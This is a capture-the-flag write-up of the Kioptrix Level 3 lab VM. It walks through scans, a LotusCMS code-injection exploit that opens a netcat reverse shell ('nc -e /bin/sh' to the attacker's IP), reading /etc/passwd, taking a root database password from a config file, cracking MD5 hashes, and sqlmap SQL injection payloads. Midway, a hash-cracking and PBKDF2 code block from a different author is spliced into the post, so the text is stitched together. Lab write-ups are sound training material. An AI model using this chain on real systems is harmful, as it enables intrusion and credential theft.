Tuesday, 16 August 2016

Kioptrix Level 3

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the VM Kioptrix L3 from Vulnhub - a site dedicated to penetration testing Capture The Flag challenges.




Scenario: let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.139
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139
dirb http://192.168.180.139
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
nikto -h 192.168.180.139

In case there is SMB:
smbclient -N -L 192.168.180.139
enum4linux -a 192.168.180.139

netdiscover -r 192.168.180.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.                
 192.168.180.139 00:0c:29:e3:3f:e5      1      60  VMware, Inc.                
 192.168.180.254 00:50:56:ee:9d:40      1      60  VMware, Inc.    

nmap -sV -T4 -O -F --version-light 192.168.180.139
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:38 EDT
Nmap scan report for 192.168.180.139
Host is up (0.00019s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:39 EDT
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:

Uptime guess: 0.001 days (since Mon Aug 15 01:38:55 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.18 ms 192.168.180.139

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.346KB)

nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139

Nothing interesting from this scan.

dirb http://192.168.180.139

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Aug 15 01:49:58 2016
URL_BASE: http://192.168.180.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.180.139/ ----
==> DIRECTORY: http://192.168.180.139/cache/                                   
==> DIRECTORY: http://192.168.180.139/core/                                    
+ http://192.168.180.139/data (CODE:403|SIZE:326)                              
+ http://192.168.180.139/favicon.ico (CODE:200|SIZE:23126)                     
==> DIRECTORY: http://192.168.180.139/gallery/                                 
+ http://192.168.180.139/index.php (CODE:200|SIZE:1819)                        
==> DIRECTORY: http://192.168.180.139/modules/                                 
==> DIRECTORY: http://192.168.180.139/phpmyadmin/                              
+ http://192.168.180.139/server-status (CODE:403|SIZE:335)                     
==> DIRECTORY: http://192.168.180.139/style/                                   
                                                                               
---- Entering directory: http://192.168.180.139/cache/ ----
+ http://192.168.180.139/cache/index.html (CODE:200|SIZE:1819)                 
                                                                               
---- Entering directory: http://192.168.180.139/core/ ----
==> DIRECTORY: http://192.168.180.139/core/controller/                         
+ http://192.168.180.139/core/index.php (CODE:200|SIZE:0)                      
==> DIRECTORY: http://192.168.180.139/core/lib/                                
==> DIRECTORY: http://192.168.180.139/core/model/                              
==> DIRECTORY: http://192.168.180.139/core/view/                               
                                                                               
---- Entering directory: http://192.168.180.139/gallery/ ----
+ http://192.168.180.139/gallery/index.php (CODE:500|SIZE:5650)                
==> DIRECTORY: http://192.168.180.139/gallery/photos/                          
==> DIRECTORY: http://192.168.180.139/gallery/themes/                          
                                                                               
---- Entering directory: http://192.168.180.139/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/ ----
+ http://192.168.180.139/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)          
+ http://192.168.180.139/phpmyadmin/index.php (CODE:200|SIZE:8136)             
==> DIRECTORY: http://192.168.180.139/phpmyadmin/js/                           
==> DIRECTORY: http://192.168.180.139/phpmyadmin/lang/                         
+ http://192.168.180.139/phpmyadmin/libraries (CODE:403|SIZE:342)              
+ http://192.168.180.139/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)              
==> DIRECTORY: http://192.168.180.139/phpmyadmin/scripts/                      
==> DIRECTORY: http://192.168.180.139/phpmyadmin/themes/                       
                                                                               
---- Entering directory: http://192.168.180.139/style/ ----
+ http://192.168.180.139/style/admin.php (CODE:200|SIZE:356)                   
+ http://192.168.180.139/style/index.php (CODE:200|SIZE:0)                     
                                                                               
---- Entering directory: http://192.168.180.139/core/controller/ ----
+ http://192.168.180.139/core/controller/index.php (CODE:200|SIZE:0)           
                                                                               
---- Entering directory: http://192.168.180.139/core/lib/ ----
+ http://192.168.180.139/core/lib/index.php (CODE:200|SIZE:0)                  
                                                                               
---- Entering directory: http://192.168.180.139/core/model/ ----
+ http://192.168.180.139/core/model/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.180.139/core/view/ ----
+ http://192.168.180.139/core/view/index.php (CODE:200|SIZE:0)                 
                                                                               
---- Entering directory: http://192.168.180.139/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Aug 15 01:50:07 2016
DOWNLOADED: 46120 - FOUND: 17


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.139/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00489:  C=301      9 L      31 W    357 Ch  "cache"
00692:  C=301      9 L      31 W    356 Ch  "core"
00779:  C=403     10 L      33 W    326 Ch  "data"
02082:  C=301      9 L      31 W    362 Ch  "phpmyadmin"
03035:  C=404      9 L      35 W    324 Ch  "yomama"


^C
Finishing pending requests...


nikto -h 192.168.180.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.139
+ Target Hostname:    192.168.180.139
+ Target Port:        80
+ Start Time:         2016-08-15 02:01:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2016-08-15 02:01:22 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.180.139/phpmyadmin/Documentation.html
phpMyAdmin 2.11.3 Documentation

http://192.168.180.139/phpmyadmin
Welcome to phpMyAdmin 2.11.3deb1ubuntu1.3

http://192.168.180.139/phpmyadmin/changelog.php
2.11.3.0 (2007-12-08)

http://192.168.180.139/index.php?system=Admin

Proudly Powered by: LotusCMS

http://192.168.180.139/gallery/index.php

At this point I added kioptrix3.com to the hosts file.

Did not work:
https://www.exploit-db.com/exploits/15964/

Let's try this one:
https://github.com/Hood3dRob1n/LotusCMS-Exploit

./lotusRCE.sh kioptrix3.com /

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.180.132
What PORT?
443

OK, open your local listener and choose the method for back connect:
1) NetCat -e    3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.139] 47705

ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3   2844  1692 ?        Ss   04:33   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   04:33   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   04:33   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   04:33   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   04:33   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   04:33   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   04:33   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   04:33   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpi_notify]
root       104  0.0  0.0      0     0 ?        S<   04:33   0:00 [kseriod]
root       143  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       144  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       145  0.0  0.0      0     0 ?        S<   04:33   0:00 [kswapd0]
root       187  0.0  0.0      0     0 ?        S<   04:33   0:00 [aio/0]
root      1272  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata/0]
root      1275  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata_aux]
root      1284  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_0]
root      1287  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_1]
root      2208  0.0  0.0      0     0 ?        S<   04:33   0:00 [kjournald]
root      2364  0.0  0.1   2224   664 ?        S<s  04:34   0:00 /sbin/udevd --daemon
root      2732  0.0  0.0      0     0 ?        S<   04:34   0:00 [kpsmoused]
root      3864  0.0  0.1   1716   516 tty4     Ss+  04:34   0:00 /sbin/getty 38400 tty4
root      3865  0.0  0.0   1716   512 tty5     Ss+  04:34   0:00 /sbin/getty 38400 tty5
root      3869  0.0  0.1   1716   516 tty2     Ss+  04:34   0:00 /sbin/getty 38400 tty2
root      3870  0.0  0.1   1716   516 tty3     Ss+  04:34   0:00 /sbin/getty 38400 tty3
root      3872  0.0  0.1   1716   516 tty6     Ss+  04:34   0:00 /sbin/getty 38400 tty6
syslog    3913  0.0  0.1   1936   644 ?        Ss   04:34   0:00 /sbin/syslogd -u syslog
root      3932  0.0  0.1   1872   548 ?        S    04:34   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      3934  0.0  0.3   3028  1856 ?        Ss   04:34   0:00 /sbin/klogd -P /var/run/klogd/kmsg
root      3959  0.0  0.1   5316  1020 ?        Ss   04:34   0:00 /usr/sbin/sshd
root      4015  0.0  0.1   1772   524 ?        S    04:34   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4057  0.0  3.2 127228 16668 ?        Sl   04:34   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4059  0.0  0.1   1700   552 ?        S    04:34   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
daemon    4123  0.0  0.0   1984   420 ?        Ss   04:34   0:00 /usr/sbin/atd
root      4142  0.0  0.1   2104   892 ?        Ss   04:34   0:00 /usr/sbin/cron
root      4165  0.0  1.2  20780  6392 ?        Ss   04:34   0:00 /usr/sbin/apache2 -k start
www-data  4184  0.0  1.2  21272  6604 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4185  0.0  1.5  22032  7852 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4186  0.0  1.4  21732  7332 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4187  0.0  1.6  22280  8364 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4188  0.0  1.3  21308  6996 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
dhcp      4201  0.0  0.1   2440   764 ?        Ss   04:34   0:00 dhclient
root      4208  0.0  0.0   1716   508 tty1     Ss+  04:34   0:00 /sbin/getty 38400 tty1
www-data  4209  0.0  1.2  21304  6692 ?        S    04:37   0:00 /usr/sbin/apache2 -k start
www-data  4240  0.0  1.2  21272  6624 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4241  0.0  1.3  21404  6736 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4242  0.0  1.6  22560  8304 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4254  0.0  1.2  21280  6612 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4326  0.0  0.0   1772   488 ?        S    05:45   0:00 sh -c nc -e /bin/sh 192.168.180.132 443
www-data  4327  0.0  0.0   1772   488 ?        R    05:45   0:00 sh
www-data  4328  0.0  0.1   2364   920 ?        R    05:46   0:00 ps -aux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

ls -la /home/loneferret/
total 64
drwxr-xr-x 3 loneferret loneferret  4096 Apr 17  2011 .
drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
-rw-r--r-- 1 loneferret users         13 Apr 18  2011 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
-rw------- 1 root       root          15 Apr 15  2011 .nano_history
-rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
-rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
-rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

A sudo user.

cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

cat /etc/issue
DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly, 
caused by using this system. We suggest you do not connect this installation
to the Internet. It is, after all, a vulnerable setup. 
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.
<ip> kioptrix3.com
This challenge contains a Web Application.

If you have any questions, please direct them to:
comms[at]kioptrix.com
Hope you enjoy this challenge.
-Kioptrix Team

Ubuntu 8.04.3 LTS \n \l

cat /etc/debian_version
lenny/sid

uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Something I missed at first, in the gallery config:
cat gconfig.php

<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";


http://kioptrix3.com/phpmyadmin/

SELECT *
FROM `dev_accounts`
WHERE 1
LIMIT 0 , 30

id  username    password
1   dreg        0d3eccfb887aabd50f243b3f155c0f85  <- Mast3r
2   loneferret  5badcaf789d3d1d09794d8f021f40f0e  <- starwars
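The dev_accounts table stores unsalted MD5, which is why both hashes fell to a wordlist so easily. This added example (my code, not from the post or from Gallarific) shows why one pass over a wordlist checks every account at once, and the salted PBKDF2 storage that should have been used instead; the wordlist is constructed, and the two hashes are the ones dumped above.

```python
import hashlib
import hmac
import os

# Hashes exactly as dumped from dev_accounts above (unsalted MD5).
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed stand-in for a real dictionary such as rockyou.txt.
WORDLIST = ["123456", "password", "starwars", "letmein", "Mast3r", "qwerty"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def crack_unsalted(accounts, wordlist):
    """Return {user: password} for every account whose MD5 is in the wordlist.

    Without a salt, one MD5 per candidate word is compared against ALL
    accounts at once, and two users with the same password share a hash,
    so the cost of the attack does not grow with the number of accounts.
    """
    by_hash = {}
    for user, digest in accounts.items():
        by_hash.setdefault(digest.lower(), []).append(user)
    cracked = {}
    for word in wordlist:
        for user in by_hash.get(md5_hex(word), []):
            cracked[user] = word
    return cracked


# --- what the table should have stored instead ---------------------------
ITERATIONS = 200_000


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, packed into one field."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt/iterations; constant-time compare."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Per-account cost with salting: each guess must be rehashed per salt.
    print("unsalted MD5 vs wordlist:", crack_unsalted(DEV_ACCOUNTS, WORDLIST))
    stored = {u: hash_password(p) for u, p in crack_unsalted(DEV_ACCOUNTS, WORDLIST).items()}
    for user, record in stored.items():
        print(user, record[:60] + "...", verify_password("starwars", record))
```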



Something even easier, which I found in other reviews:

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:04:27

[04:04:27] [INFO] resuming back-end DBMS 'mysql' 
[04:04:27] [INFO] testing connection to the target URL
[04:04:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:04:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:04:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:04:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:04:27] [INFO] fetching database names
[04:04:28] [INFO] the SQL query used returns 3 entries
[04:04:28] [INFO] retrieved: information_schema
[04:04:28] [INFO] retrieved: gallery
[04:04:28] [INFO] retrieved: mysql
available databases [3]:                                                       
[*] gallery
[*] information_schema
[*] mysql

[04:04:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'


sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
[*] starting at 04:08:55

[04:08:55] [INFO] resuming back-end DBMS 'mysql' 
[04:08:55] [INFO] testing connection to the target URL
[04:08:55] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:08:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:08:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
